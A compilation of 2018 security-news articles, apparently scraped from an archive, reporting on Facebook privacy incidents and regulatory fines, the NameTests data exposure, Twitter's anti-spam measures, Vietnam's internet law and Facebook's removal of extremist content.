In its statement, IMF Bentham said it appeared Facebook learned of the breach in late 2015, but failed to tell users about it until this year.

IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-US$7,500).

This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.

Facebook did not directly comment on the IMF Bentham action but a spokesperson told AFP Wednesday: "We are fully cooperating with the investigation currently underway by the Australian Privacy Commissioner.

"We will review any additional evidence that is made available when the UK Office of the Information Commissioner releases their report."


Britain to Fine Facebook Over Data Breach
18.7.2018 securityweek  Incindent 
Social

Britain's data regulator said Wednesday it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office (ICO) began investigating the social media giant earlier this year, when evidence emerged that an app had been used to harvest the data of tens of millions of Facebook users worldwide.

In the worst ever public relations disaster for the social media giant, Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica, which was working for US President Donald Trump's 2016 campaign.

Cambridge Analytica, which also had meetings with the Leave.EU campaign ahead of Britain's EU referendum in 2016, denies the accusations and has filed for bankruptcy in the United States and Britain.

"In 2014 and 2015, the Facebook platform allowed an app... that ended up harvesting 87 million profiles of users around the world that was then used by Cambridge Analytica in the 2016 presidential campaign and in the referendum," Elizabeth Denham, the information commissioner, told BBC radio.

Wednesday's ICO report said: "The ICO's investigation concluded that Facebook contravened the law by failing to safeguard people's information."

Without detailing how the information may have been used, it said the company had "failed to be transparent about how people's data was harvested by others".

The ICO added that it plans to issue Facebook with the maximum available fine for breaches of the Data Protection Act -- an equivalent of $660,000 or 566,000 euros.

Because of the timing of the breaches, the ICO said it was unable to impose penalties that have since been introduced by the European General Data Protection, which would cap fines at 4.0 percent of Facebook's global turnover.

In Facebook's case this would amount to around $1.6 billion (1.4 billion euros).

"In the new regime, they would face a much higher fine," Denham said.

- 'Doing the right thing' -

"We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes," Denham said.

"New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law."

In May, Facebook chief Mark Zuckerberg apologised to the European Parliament for the "harm" caused.

EU Justice Commissioner Vera Jourova welcomed the ICO report.

"It shows the scale of the problem and that we are doing the right thing with our new data protection rules," she said.

"Everyone from social media firms, political parties and data brokers seem to be taking advantage of new technologies and micro-targeting techniques with very limited transparency and responsibility towards voters," she said.

"We must change this fast as no-one should win elections using illegally obtained data," she said, adding: "We will now assess what can we do at the EU level to make political advertising more transparent and our elections more secure."

- Hefty compensation bill -

The EU in May launched strict new data-protection laws allowing regulators to fine companies up to 20 million euros ($24 million) or four percent of annual global turnover.

But the ICO said because of the timing of the incidents involved in its inquiry, the penalties were limited to those available under previous legislation.

The next phase of the ICO's work is expected to be concluded by the end of October.

Erin Egan, chief privacy officer at Facebook, said: "We have been working closely with the ICO in their investigation of Cambridge Analytica, just as we have with authorities in the US and other countries. We're reviewing the report and will respond to the ICO soon."

The British fine comes as Facebook faces a potential hefty compensation bill in Australia, where litigation funder IMF Bentham said it had lodged a complaint with regulators over the Cambridge Analytica breech -- thought to affect some 300,000 users in Australia.

IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-$7,500).

This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.


Vietnam Activists Flock to 'Safe' Social Media After Cyber Crackdown
6.7.2018 securityweek
Social

Tens of thousands of Vietnamese social media users are flocking to a self-professed free speech platform to avoid tough internet controls in a new cybersecurity law, activists told AFP.

The draconian law requires internet companies to scrub critical content and hand over user data if Vietnam's Communist government demands it.

The bill, which is due to take effect from January 1, sparked outcry from activists, who say it is a chokehold on free speech in a country where there is no independent press and where Facebook is a crucial lifeline for bloggers.

The world's leading social media site has 53 million users in Vietnam, a country of 93 million.

Many activists are now turning to Minds, a US-based open-source platform, fearing Facebook could be complying with the new rules.

"We want to keep our independent voice and we also want to make a point to Facebook that we're not going to accept any censorship," Tran Vi, editor of activist site The Vietnamese, which is blocked in Vietnam, told AFP from Taiwan.

Some activists say they migrated to Minds after content removal and abuse from pro-government Facebook users.

Two editors' Facebook accounts were temporarily blocked and The Vietnamese Facebook page can no longer use the "instant article" tool to post stories.

Nguyen Chi Tuyen, an activist better known by his online handle Anh Chi, says he has moved to Minds as a secure alternative, though he will continue using Facebook and Twitter.

"It's more anonymous and a secretive platform," he said of Minds.

He has previously had to hand over personal details to Facebook to verify his identity and now fears that information could be used against him.

- 'Scary' law -

About 100,000 new active users have registered in Vietnam in less than a week, many posting on politics and current affairs, Minds founder and CEO Bill Ottman told AFP.

"This new cybersecurity law is scaring a lot of people for good reason," he said from Connecticut.

"It's certainly scary to think that you could not only be censored but have your private conversations given to a government that you don't know what they're going to use that for."

The surge of new users from Vietnam now accounts for nearly 10 percent of Minds total user base of about 1.1 million.

Users are not required to register with personal data and all chats are encrypted.

Vietnam's government last year announced a 10,000-strong cybersecurity army tasked with monitoring incendiary material online.

In its unabashed defence of the new law, Vietnam has said it is aimed at protecting the regime and avoiding a "colour revolution", but refused to comment to AFP on Thursday.

Facebook told AFP it is reviewing the law and says it considers government requests to take down information in line with its Community Standards -- and pushes back when possible.

Google declined to comment on the new law when asked by AFP, but their latest Transparency report showed that it had received 67 separate requests from the Vietnamese government to remove more than 6,500 items since 2009, the majority since early last year.

Most were taken down, though Google does not provide precise data on content removal compliance.

Ottman says countries like Vietnam are fighting a losing battle trying to control online expression.

"It's like burning books, it just causes more attention to be brought to those issues and it further radicalises those users because they're so upset that they're getting censored," he said.


Facebook Responding to US Regulators in Data Breach Probe

5.7.2018 securityweek  Social

Facebook acknowledged Tuesday it was facing multiple inquiries from US and British regulators about the major Cambridge Analytica user data scandal.

The leading social network offered no details but its admission confirmed reports of a widening investigation into the misuse of private data by Facebook and its partners.

"We are cooperating with officials in the US, UK and beyond," a Facebook spokesman said in response to an AFP query.

"We've provided public testimony, answered questions, and pledged to continue our assistance as their work continues."

The Washington Post reported that the Securities and Exchange Commission, Federal Trade Commission and FBI as well as the Justice Department are looking into the massive breach of users' personal data and how the company handled it.

Facebook shares closed the shortened Nasdaq trading day down 2.35 percent to $192.73, heading into an Independence Day holiday with investors mulling what effect the investigations may have on the California-based internet giant.

Facebook has admitted that up to 87 million users may have had their data hijacked by British consultancy Cambridge Analytica, which worked for US President Donald Trump during his 2016 campaign.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg said at a hearing in Brussels that it became clear in the last two years that Facebook executives didn't do enough to prevent the platform "from being used for harm."

Zuckerberg was grilled about the breach in US Congress in April.

It remains unclear what if any penalties Facebook may face from the latest requests but the tech giant is legally bound to comply with a 2011 consent decree with the FTC on protecting private user data.

Any SEC inquiry could look at whether Facebook adequately disclosed key information to investors.


The Social network giant Facebook confirms it shared data with 61 tech firms after 2015
3.7.2018 securityaffairs
Social

On Friday, Facebook provided a 748-page long report to Congress that confirms the social network shared data with at least 61 tech firms after 2015.
This is the worst period in the history of the social network, now Facebook admitted to having shared users’ data with 61 tech firms.

The problem is that Facebook allowed tech companies and app developers to access its users’ data after announcing it had restricted third-party firms to access its data in 2015.

Immediately after the Cambridge Analytica privacy scandal that affected 87 million users, Facebook attempted to mitigate the pressure of the media by confirming that it already restricted third-party access to its users’ data since May 2015.

On Friday, Facebook provided a 748-page long report to Congress that confirms the practice of sharing data with 61 tech firms after 2015.

The company also granted a “one-time” six-month extension to the companies to come into compliance with Facebook’s new privacy policy.

“In April 2014, we announced that we would more tightly restrict our platform APIs to
prevent abuse. At that time, we made clear that existing apps would have a year to transition—at which point they would be forced (1) to migrate to the more restricted API and (2) be subject to Facebook’s new review and approval protocols.” reads the report.

“The vast majority of companies were required to make the changes by May 2015; a small number of companies (fewer than 100) were given a one-time extension of less than six months beyond May 2015 to come into compliance.”

In addition, the company admitted that a very small number of companies (fewer than 10) have had access to limited friends’ data as a result of API access that they
received in the context of a beta test.

The social media firm also shared a list containing 52 companies that it has authorized to build versions of Facebook or Facebook features for their devices and products.

The list includes Acer, Amazon, Apple, Blackberry, Microsoft, Motorola/Lenovo, Samsung, Sony, Spotify, and the Chinese companies Huawei and Alibaba.

“The partnerships—which we call “integration partnerships”—began before iOS and
Android had become the predominant ways people around the world accessed the internet on their mobile phones. ” explained Facebook.

“We engaged companies to build integrations for a variety of devices, operating systems, and other products where we and our partners wanted to offer people a way to receive Facebook or Facebook experiences,” the document reads. “These integrations were built by our partners, for our users, but approved by Facebook.”

The social network firm confirmed it has already interrupted 38 of these 52 partnerships and additional seven will be discontinued by the end of July, and another one by the end of this October. The company will continue the partnership with Tobii, an accessibility app that enables people with ALS to access Facebook, Amazon, Apple, Mozilla, Alibaba and Opera.

“Three partnerships will continue: (1) Tobii, an accessibility app that enables people with ALS to access Facebook; (2) Amazon; and (3) Apple, with whom we have agreements that extend beyond October 2018. We also will continue partnerships with Mozilla, Alibaba and Opera— which enable people to receive notifications about Facebook in their web browsers—but their integrations will not have access to friends’ data.” added the company.

Privacy advocated and security experts defined as questionable the way the social network managed users’ data, especially after 2015.

Just a few days ago, I reported the news that a popular third-party quiz app named NameTests was found exposing data of up to 120 million Facebook users.


Facebook is notifying 800,000 users affected by a blocking bug
3.7.2018 securityaffairs
Social

Yesterday the social network giant Facebook started notifying 800,000 users affected by a blocking bug. The company has already fixed it.
When a Facebook user blocks someone, the blocked user will be not able to interact with him, this means that he will not see his posts, it will not able to start conversations on Messenger or add him as a friend. The blocked user may have also been able to contact the blocker via Messenger.

Facebook discovered a bug affecting its platform that allowed blocked users to interact with the accounts that decided to block them. As result, blocked users were able to see some of the content posted by individuals who had blocked them.

The issue was introduced on May 29, and the social network giant addressed it on June 5.

“Starting today we are notifying over 800,000 users about a bug in Facebook and Messenger that unblocked some people they had blocked. The bug was active between May 29 and June 5 — and while someone who was unblocked could not see content shared with friends, they could have seen things posted to a wider audience. For example pictures shared with friends of friends. ” wrote Facebook Chief Privacy Officer Erin Egan.

According to Egan, one a user has been blocked will not see content shared only with friends, but he may have been shown content shared with “friends of friends.

Egan clarified that blocking also automatically unfriends users if they were previously friends.

Below the details shared by Egan on this specific bug.

It did not reinstate any friend connections that had been severed;
83% of people affected by the bug had only one person they had blocked temporarily unblocked; and
Someone who was unblocked might have been able to contact people on Messenger who had blocked them.
Facebook has fixed the bug and everyone has been blocked again, the company is sending a notification t the affected accounts encouraging them to check their blocked list.

Facebook bug


Facebook Notifies 800,000 Users of Blocking Bug
3.7.2018 securityweek 
Social

Facebook on Monday started notifying 800,000 users affected by a bug that resulted in blocked individuals getting temporarily unblocked. The social media giant also detailed some new API restrictions designed to better protect user information.

When you block someone on Facebook, you prevent them from seeing your posts, starting conversations on Messenger, or adding you as a friend. However, a Facebook and Messenger bug introduced in May 29 and addressed on June 5 led to users being able to see some of the content posted by individuals who had blocked them.

According to Facebook Chief Privacy Officer Erin Egan, blocked users could not see content shared only with friends, but they may have been shown content shared with “friends of friends.” The blockee may have also been able to contact the blocker via Messenger.

Egan clarified that friend connections were not reinstated as a result of the bug and 83 percent of impacted users had only one blocked person temporarily unblocked. Affected users will see a notification in their account.

New API restrictions and changes

Facebook also announced on Monday additional measures taken following the Cambridge Analytica incident, in which personal data on tens of millions of users was improperly shared with the British political consultancy through an app.

The social media giant previously shared some information on the steps taken to better protect elections and user data, and it has now announced new changes affecting application developers.

Developers have been informed that several APIs have been or will be deprecated, including the Graph API Explorer App, Profile Expression Kit, Trending API, the Signal tool, Trending Topics, Hashtag Voting, Topic Search, Topic Insights, Topic Feed, and Public Figure. The Trending and Topic APIs are part of the Media Solutions toolkit.

Some APIs will be deprecated – including due to low usage – while others will be restricted.

Developers will once again be allowed to search for Facebook pages via the Pages API, but they will need Page Public Content Access permissions, which can only be obtained via the app review process.

As for marketing tools, Facebook announced that the Marketing API can only be used by reviewed apps, and that it’s introducing new app review permissions for the Live Video and Lead Ads Retrieval APIs.


Facebook App Exposed Data of 120 Million Users
2.7.2018 securityweek 
Social

A recently addressed privacy bug on Nametests.com resulted in the data of over 120 million users who took personality quizzes on Facebook to be publicly exposed.

Patched as part of Facebook’s Data Abuse Bounty Program, the vulnerability resided in Nametests.com serving users’ data to any third-party that requested it, something that shouldn’t normally happen.

Facebook launched its Data Abuse Bounty Program in April, as part of its efforts to improve user privacy following the Cambridge Analytica scandal. The company also updated its terms on privacy and data sharing, but also admitted to tracking people over the Internet, even those who are not Facebook users.

The issue in Nametests.com was reported by Inti De Ceukelaire, who discovered that, when loading a personality test, the website would fetch all of his personal information from http://nametests.com/appconfig_user and display it on the page.

Websites shouldn’t normally be allowed to access the information, as web browsers do prevent such behavior. The data requested from Nametests.com, however, was wrapped in JavaScript, meaning that it could be shared with other websites.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,” the researcher explains.

To verify that this was indeed happening, he set up a website that connected to Nametests.com and would fetch information about the visitor. The access token provided by Nametests.com could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“It would only take one visit to our website to gain access to someone’s personal information for up to two months,” De Ceukelaire says.

Another issue the researcher discovered was that the user information would continue to be exposed even after they deleted the application. With no log out functionality available, users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The bug was reported to Facebook’s Data Abuse program on April 22 and a fix was rolled out by June 25, when the researcher noticed that third-parties could no longer access visitors’ personal information as before.

The vulnerability could “have affected Facebook information people shared with nametests.com. To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it,” Facebook said.

The social platform also donated $8,000 (they apparently doubled the $4,000 bounty because the researcher chose to donate it to charity) to the Freedom of the Press foundation.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher notes.


Twitter shared details about its strategy for fighting spam and bots
30.6.2018 securityaffairs
Social

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platform are a privileged tool for psyops and malicious campaign, for this reason, Twitter rolled out new features to detect and prevent any abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims it challenged in May more than 9.9 million potentially automated accounts used for malicious activity every week. The data shows a significant decrease from 6.4 million in December 2017.
The social media platform said that the security measures allowed to drastically reduce spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bots activity detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of New ones.
Twitter
Twitter is incresing checks on the sign-up process to make idifficult to register spam accounts, for example requesting more iteration ti the user such as the confermatuon of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Facebook Quiz app NameTests left 120 Million users’ data exposed online
30.6.2018 securityaffairs
Social

Experts discovered a third-party quiz app, called NameTests, that was found exposing data of up to 120 million Facebook users.
A bug on the Nametests.com exposed data of over 120 million users who took personality quizzes on Facebook, the good news is that the flaw was addressed as part of the Facebook’s Data Abuse Bounty Program launched in April.

nametests

The issue resided in Nametests.com that shares users’ data with any third-party that requested it.

The flaw was reported by the researchers Inti De Ceukelaire, who explained that when loading a personality test, the website displays personal information loaded from http://nametests.com/appconfig_user.

The data loaded from Nametests.com was wrapped in JavaScript, this means that it could be shared with other websites.

“In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening.” the researcher wrote in a blog post.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,”

The experts set up a website that fetched data about the visitor from the Nametests.com website. In turn, ametests.com provided the access token that could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.” De Ceukelaire added.

Below the video PoC published by the expert that shows how NameTests was revealing visitor’s identity even after deleting the app.

nametests

In order to prevent such behavior, the user would have had to manually delete the cookies on their device.

The expert also discovered that the user information would continue to be available through the website even after they deleted the application. Users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The issue was reported to Facebook’s Data Abuse program on April 22 and the company and a fix was rolled out on June 25.

According to Facebook, the bug could “have affected Facebook information people shared with nametests.com”, in response to the incident the tech giant revoked the access tokens for everyone on Facebook who has signed up to use this app

“It was reported by Inti De Ceukelaire and we worked with the app’s developer — Social Sweethearts — to address the website vulnerability he identified which could have affected Facebook information people shared with nametests.com.” reads a post published by Facebook.

” To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it.”
Facebook awarded the expert with $8,000 instead $4,000 bounty because he chose to donate it to charity.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher concluded.


Twitter shared details about its strategy for fighting spam and bots
29.6.2018 securityaffairs 
Social 

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platform are a privileged tool for psyops and malicious campaign, for this reason, Twitter rolled out new features to detect and prevent any abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims it challenged in May more than 9.9 million potentially automated accounts used for malicious activity every week. The data shows a significant decrease from 6.4 million in December 2017.
The social media platform said that the security measures allowed to drastically reduce spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bots activity detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of New ones.
Twitter
Twitter is incresing checks on the sign-up process to make idifficult to register spam accounts, for example requesting more iteration ti the user such as the confermatuon of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Twitter Unveils New Processes for Fighting Spam, Bots
29.6.2018 securityweek 
Social

Twitter this week shared some details on new processes designed to prevent malicious automation and spam, along with data on the positive impact of the measures implemented in the past period.

Spam and bots are highly problematic on Twitter, but the social media giant says it has rolled out some new systems that have helped its fight against these issues. The company claims that last month it challenged more than 9.9 million potentially spammy or automated accounts every week, up from 6.4 million in December last year.

Twitter says it now removes 214% more spam accounts compared to 2017. It also claims that recent changes have led to a significant drop in spam reports received from users, from 25,000 daily reports in March to 17,000 in May.

The company also reported suspending over 142,000 apps in the first quarter of 2018, more than half of which were shut down within a week or even within hours after being registered.

One measure implemented recently by Twitter involves updating account metrics in near-real time. Spam accounts and bots often follow other accounts in bulk and this type of behavior should quickly be caught by Twitter’s systems. However, the company has now also decided to remove follower and engagement counts from suspicious accounts that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter’s Yoel Roth and Del Harvey said in a blog post.

The company has also made some changes to its sign-up process to make it more difficult to register spam accounts. This includes requiring new accounts to confirm an email address or phone number.

Existing accounts are also being audited to ensure that they weren’t created using automation.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” Roth and Harvey explained. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

Finally, Twitter says it has expanded its malicious behavior detection systems with tests that can involve solving a reCAPTCHA or responding to a password reset request. Complex cases are passed on to Twitter employees for review.

Twitter also announced this week that users can configure a USB security key as part of the two-factor authentication (2FA) process.

On June 21, Twitter revealed that it entered an agreement to acquire Smyte, which specializes in safety, spam and security issues. By acquiring the company, the social media giant hopes to “improve the health of conversation on Twitter.”


Facebook Claims 99% of Extremist Content Removed Without Users' Help
15.6.2018 securityweek
Social

Facebook claims growing success in fight against extremist content

At this week's International Homeland Security Forum (IHSF) hosted in Jerusalem by Israel’s minister of public security, Gilad Erdan, Facebook claimed growing success in its battle to remove extremist content from the network.

Dr. Erin Marie Saltman, Facebook counterterrorism policy lead for EMEA, said, "On Terrorism content, 99% of terrorist content from ISIS and al-Qaida we take down ourselves, without a single user flagging it to us. In the first quarter of 2018 we took down 1.9 million pieces of this type of terrorist content."

This was achieved by a combination of Facebook staff and machine learning algorithms. "Focusing our machine learning tools on the most egregious terrorist content we are able to speak to scale and speed of efforts much more openly. But human review and operations is also always needed."

However, the implication that Facebook is winning the war against extremism is countered by a report ('Spiders of the Caliphate: Mapping the Islamic Stateís Global Support Network on Facebook' PDF) published in May 2018 by the Counter Extremism Project (CEP).

CEP was launched in 2014 by former U.S. government officials, including former Homeland Security adviser Frances Townsend, former Connecticut Senator Joseph Lieberman, and Mark Wallace, a former U.S. Ambassador to the United Nations.

Its report mapped 1,000 Facebook profiles explicitly supporting IS between October 2017 and March 2018. Using the open source network analysis and visualization program, Gephi, it found that visible 'friends' expanded the 1,000 nodes with 5,347 edges. Facebook's friending mechanism is particularly criticized as a means by which IS accounts find new targets to recruit.

The report actually refers to the 99% claim, implying that Saltman's claim is not a new development superseding the findings of CEP: "Given ISís ongoing presence on the platform, it is clear that Facebookís current content moderation systems are inadequate, contrary to the companyís public statements. Facebook has said that they remove 99% of IS and Al Qaeda content using automated systems..."

In fact, CEP fears that Facebook relies too heavily on its algorithms for finding and removing terrorist content. "This reliance on automated systems means IS supportersí profiles often go unremoved by Facebook and can remain on the platform for extended periods of time." It gives the example of a video from the IS Amaq news agency that was posted in September 2016 and remained available when the report was written in April 2018.

"The video depicts combat footage from the Battle of Mosul and shows how IS produced a variety of weapon systems including car bombs and rocket launchers," notes the report.

Another example describes an ISIS supporter friending a non-Muslim and then gradually radicalizing him during the six-month period. "ID 551 played a clear role in radicalizing ID 548 and recruiting him as an IS supporter," says the report. "Facebook was the platform that facilitated the process, and it also functioned as an IS news source for him. Furthermore, given his connections with existing IS networks on Facebook, the moment that ID 548 wishes to become more than an online supporter he has the necessary contacts available to him. These are individuals who can assist with traveling to fight for the group or staging an attack in America. This case provides a detailed insight into the scope to which IS has taken advantage of Facebookís half-measures to combating extremism online."

This is not a simple problem. Taking down suspect terrorist content that is posted and used legitimately is a direct infringement of U.S. users' First Amendment rights. Dr Saltman described this issue at the IHSF conference. "We see," she said, "that pieces of terrorist content and imagery are used by legitimate voices as well; activists and civil society voices who share the content to condemn it, mainstream media using imagery to discuss it within news segments; so, we need specialized operations teams with local language knowledge to understand the nuance of how some of this content is shared."

To help avoid freedom of speech issues, Facebook has made its enforcement process more transparent. "I am pleased to say," said Saltman, "that just last month we made the choice to proactively be more transparent about our policies, releasing much more information about how we define our global policies through our Comprehensive Community Standards. These standards cover everything from keeping safe online to how we define dangerous organizations and terrorism."

At the same time, appealing removal decisions is made easier and adjudicated by a human. This can be problematic. According to a January 2018 report in the Telegraph, an IS supporter in the UK who shared large amounts of IS propaganda had his account reactivated nine times by Facebook after he complained to the moderators that Facebook was stifling his free speech.

Where clearly illegal material is visible, Facebook cooperates proactively with law enforcement. Waheba Issa Dais, a Wisconsin 45-year-old mother of two, is in federal custody after being charged on Wednesday this week with providing 'material support or resources to a foreign terrorist organization.'

The Milwaukee Journal Sentinel reports, "The investigation appears to have started in January after Facebook security told the FBI that there was a 'Wisconsin-based user posting detailed instructions on how to make explosive vest bombs in support of ISIS,' the affidavit states. The person behind the Facebook posts, who the FBI said they determined was Dais, 'also appeared to be engaged in detailed question and answer sessions discussing substances used to make bombs'."

Ricin is mentioned. It would be easy enough for a word like 'ricin' to activate an alert. It is in the less obvious extremist content that machine learning algorithms need to be used. But machine learning is still a technology with great promise and partial delivery. "The real message is that Facebook has made it more difficult for ISIS and Al-Qaida to use their platform for recruiting," Ron Gula, president and co-founder of Gula Tech Adventures told SecurityWeek.

"Machine learning is great at recognizing patterns. Unfortunately, if the terrorists change their content and recruiting methods, they may still be able to leverage Facebook. This type of detection could turn into a cat and mouse game where terror organizations continuously change their tactics, causing Facebook to constantly have to update their rules and intelligence about what should be filtered."

The extremists won't make it easy. "They have become very good at putting a reasonable 'face' on much of their online recruiting material," explains John Dickson, Principal at the Denim Group. "Once they have someone interested is when they fully expose their intent. Given this situation, I’m not sure how [the algorithms] don’t create a ton of false positives and start taking down legitimate Islamic content."

Nearly every security activity creates false positives. "I suspect this will be no different," he continued. "Machine learning or more specifically supervised learning likely will help aid security analysts attempting to distinguish between legitimate jihadist recruiting material and generic Islamic content. But it will still need a human to make the final decisions – and that human is likely to be biased by the American attitude towards freedom of speech."

In the final analysis, Facebook is caught between competing demands: a very successful business model built on making 'friending' and posting easy, the First Amendment protecting free speech; and moral and legal demands to find and exclude disguised extremist needles hidden in a very large haystack of 2.2 billion active Facebook users every month.


Facebook Admits Privacy Settings 'Bug' Affecting 14 Million Users
8.6.2018 securityweek
Social

Facebook acknowledged Thursday a software glitch that changed the settings of some 14 million users, potentially making some posts public even if they were intended to be private.

The news marked the latest in a series of privacy embarrassments for the world's biggest social network, which has faced a firestorm over the hijacking of personal data on tens of millions of users and more recently for disclosures on data-sharing deals with smartphone makers.

Erin Egan, Facebook's chief privacy officer, said in a statement that the company recently "found a bug that automatically suggested posting publicly when some people were creating their Facebook posts."

Facebook said this affected users posting between May 18 and May 27 as it was implementing a new way to share some items such as photos.

That left the default or suggested method of sharing as public instead of only for specific users or friends.

Facebook said it corrected the problem on May 22 but was unable to change all the posts, so is now notifying affected users.

"Starting today we are letting everyone affected know and asking them to review any posts they made during that time," Egan said.

"To be clear, this bug did not impact anything people had posted before -- and they could still choose their audience just as they always have. We'd like to apologize for this mistake."

Facebook confirmed earlier this week that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data in agreements that had been in place for years.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

The revelations come weeks after chief executive Mark Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 presidential campaign.


Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users

8.6.2018 securityaffairs Social

Facebook admitted that a bug affecting its platform caused the change of the settings of some 14 million users, potentially exposing their private posts to the public.
This is the worst period in the history of the social network giant that was involved in the Cambridge Analytica privacy scandal that affected at least 87 Million users.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” said Erin Egan, Facebook’s chief privacy officer.

“To be clear, this bug did not impact anything people had posted before—and they could still choose their audience just as they always have. We’d like to apologize for this mistake.”

According to Facebook, the glitch affected some of its users that published posts between May 18 and May 27 because in that period of time it was implementing a new feature for the sharing of data such as images and videos.

Evidently, something went wrong, and the overall private messages were shared as public by defaults.

The social network giant confirmed to have corrected the bug on May 22, but it was unable to change the visibility of all the posts.

The company is now notifying affected users apologizing for the technical issue.

This is the last embarrassing case that involved Facebook in the last weeks, in April, researchers from Princeton researchers reported that the Facebook’s authentication feature “Login With Facebook” can be exploited to collect user information that was supposed to be private.

Early this week, Facebook confirmed that its APIs granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.

The Chinese vendor Huawei was one of the device makers authorized to use the API, the firm, in May the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.

Facebook highlighted that the agreement was signed ten years and that its operated to prevent any abuse of the API.


Facebook Deals With Chinese Firm Draw Ire From U.S. Lawmakers
7.6.2018 securityweek
Social

Facebook drew fresh criticism from US lawmakers following revelations that it allowed Chinese smartphone makers, including one deemed a national security threat, access to user data.

The world's largest social network confirmed late Tuesday that China-based Huawei -- which has been banned by the US military and a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data.

